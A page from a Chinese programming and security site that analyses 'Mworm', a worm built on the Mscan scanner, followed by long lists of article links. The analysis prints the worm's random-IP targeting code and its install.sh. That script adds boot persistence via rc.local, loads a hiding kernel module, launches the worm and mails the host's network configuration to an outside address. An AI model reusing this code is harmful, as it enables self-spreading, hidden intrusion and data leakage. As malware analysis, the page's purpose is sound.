网页设计   C#  |  服务   FreeBSD   数据库   交换机   编程问答   托福   技术专栏  |  网络   编程   操作系统   Photoshop  |  网页制作

• Access
• asp.net
• C#
• CSS
• delphi
• FoxPro
• html
• 注册表
• Java
• Js
• jsp
• MsSQL
• MySQL
• Oracle
• php
• vc++
• 网页
• firefox

基于Mscan的蠕虫结构分析

　　Mworm是一个基于Mscan扫描器的蠕虫程序，主要是利用wuftp和rpc.statd漏洞进行传播，同时也对Windows系统存在Unicode漏洞的机器进行标识，将c:\winnt\system32\cmd.exe复制到c:\Mworm.exe。本蠕虫程序没有任何危害性。
　　
　　本蠕虫的扫描是基于Mscan进行的，主要是扫描80，21和111端口。一共包含如下程序和脚本：
　　
　　Mworm: 蠕虫主程序，负责扫描和传播。
　　
　　Mhttpd：一个Http Server，负责远程从服务端下载蠕虫压缩包。
　　
　　3c95: 一个LKM，负责隐藏含有Mscan,Mworm和Mhttpd的文件和进程。
　　
　　localsetup.sh： 将蠕虫在本地安装时候运行的脚本。
　　
　　install.sh: 编译和运行蠕虫程序，用于远程。
　　
　　start: 该文件中包含需要写入在/etc/rc.d/rc.local文件的内容。
　　
　　Mworm.tgz中包含了所有的源程序文件，而不象一些蠕虫程序里面除了脚本其他都没有源程序(:P。
　　
　　Mworm的程序流程图如下所示：
　　
　　几个小部分程序：
　　
　　产生随机IP地址，以供Mscan扫描。
　　char * create_randomIP() //create a ip address, the last bit is 1
　　{
　　int a=0,b=0,c=0;
　　char * returnv=(char*)malloc(sizeof(char)*24);
　　
　　srand(time(NULL));
　　start:;
　　a=1+(int) (223.0*rand()/(RAND_MAX+1.0));
　　b=1+(int) (255.0*rand()/(RAND_MAX+1.0));
　　c=1+(int) (223.0*rand()/(RAND_MAX+1.0));
　　
　　if (a == 127) { goto start; }
　　if (a == 0) { goto start; }
　　if (a == 1) { goto start; }
　　if (a == 2) { goto start; }
　　if (a == 3) { goto start; }
　　if (a == 4) { goto start; }
　　if (a == 5) { goto start; }
　　if (a == 6) { goto start; }
　　if (a == 7) { goto start; }
　　if (a == 8) { goto start; }
　　if (a == 9) { goto start; }
　　if (a == 10) { goto start; }
　　if (a == 49) { goto start; }
　　if (a == 192) { if (b == 168) { goto start; } }
　　sprintf(returnv,"%i.%i.%i.1", a, b,c);
　　return returnv;
　　}
　　
　　
　　install.sh，编译和运行Mworm
　　#!/bin/sh
　　
　　cat startup >> /etc/rc.d/rc.local
　　gcc -O3 -DMODULE -D__KERNEL__ -c 3c95.c
　　/sbin/insmod 3c95.o
　　killall -9 Mhttpd
　　killall -9 Mworm
　　./Mhttpd
　　./Mworm &
　　/sbin/ifconfig -a | mail -s Msanworm mscanworm@yahoo.com.cn
　　
　　
　　　
　　
　　
　　
　　
最热门文章推荐：
>· cs不支持opengl
>· opengl红宝书
>· 语言栏
>· sql语言
>· 脚本语言
>· c语言编辑器
>· 网站建设流程
>· 网站建设策划书

• · 木马喜欢“呆”在哪里
• · 特洛伊木马程序的缺省端口
• · 80端口web服务攻击痕迹
• · Windows新漏洞将任意用户提升到SYSTEM级别的权限的方法
• · 入侵者跳越攻击可能进入你的内部网
• · 黑国内一黑客站点主机的过程
• · 利用尼姆达II病毒提升自己为系统管理员
• · 企业网安全从边界做起
• · 如何突破各种防火墙的防护
• · 了解数字证书
• · 超越技术视野的中国信息安全应急体系
• · 病毒防治的原理比较
• · 硬盘保护卡的破解
• · 动态ARP可导致整个TCP/IP网络中断
• · 密码学简介
• · KV3000修复硬盘数据办法！！
• · 利用mpd搭建基于PPTP协议的企业级VPN
• · 网络攻击的六大趋势
• · 剖析入侵检测系统的安全性
• · 网上银行的安全性分析
• · 局域网的维护之网络安全
• · Linux系统中的防火墙技术及其应用
• · 关闭危险之门，防止黑客入侵
• · IT主管：网络安全从哪入手？
• · 三招助您简化网络安全
• · 电信业网络安全综合解决方案
• · Juniper网络安全方案餐饮连锁店应用
• · SecurityGateway3.0垃圾邮件的清道夫
• · WebShield和SpamKiller3000安全解决方案
• · 国税系统网络安全解决方案
• · 如何加强政府网络的全方位安全性?
• · 构建铜墙铁壁式的企业网络
• · 安全简单实用
• · 某市电信局网络安全解决方案
• · ICMP路由通告的安全问题描述及解决措施
• · 中国人民银行在广域网下的防病毒方案
• · 对安全项目的规划与管理
• · 银行网络安全系统技术方案
• · 网络安全与系统稳定性保障的解决方案
• · “网络巡警”保安全
• · 将安全触角延伸到每一角落——晓通网络商务楼用户宽带接入安全解决方案
• · 建筑立体防毒网——McAfee银行业防病毒方案
• · FENSTS网络安全整体解决方案
• · 政府上网，安全第一
• · 税务系统网络安全解决方案
• · 银行网络安全解决方案
• · 证券行业网络安全解决方案
• · 金融网络的安全分析及设计
• · 如何加强政府网络的安全
• · 网络安全综合解决方案
• · 趋势科技校园网安全方案
• · MiKey在网络办公中的安全解决方案
• · iGate易门访问控制安全解决方案
• · 瑞星专业化网络安全解决方案概述
• · 中联通讯信息安全体系之VPN解决方案
• · 网络安全整体解决方案
• · 格方网上银行系统安全解决方案
• · 电信行业网络安全解决方案(二)
• · 电信行业网络安全解决方案(一)
• · 江苏电信IP网网络安全解决方案
• · “黑客煞星”实现静态与动态平衡
• · 国内黑客高手的联系方法
• · 企业网安全分析
• · 防毒因模式而异
• · 如何选择防病毒系统
• · 安全方案面面观
• · 安全统一管理方案一览
• · 网络广告的优势与特点
• · 如何让你的网络广告更有效——网络广告策划策略探索
• · 网络广告效果已被认可发展前景颇为乐观
• · 3721上网助手拦截全部广告提升上网速度
• · 2003年中国网络广告十大盘点
• · 炼狱里的网络广告
• · 网络广告成大公司新宠05年将达80亿
• · 分析：2004弹出式广告已到生死关头
• · 弹出广告，效果才是硬道理？
• · 网络广告何时不再侵犯网民
• · 网络广告策划过程
• · 网络广告业的四大希望
• · 网络广告五步曲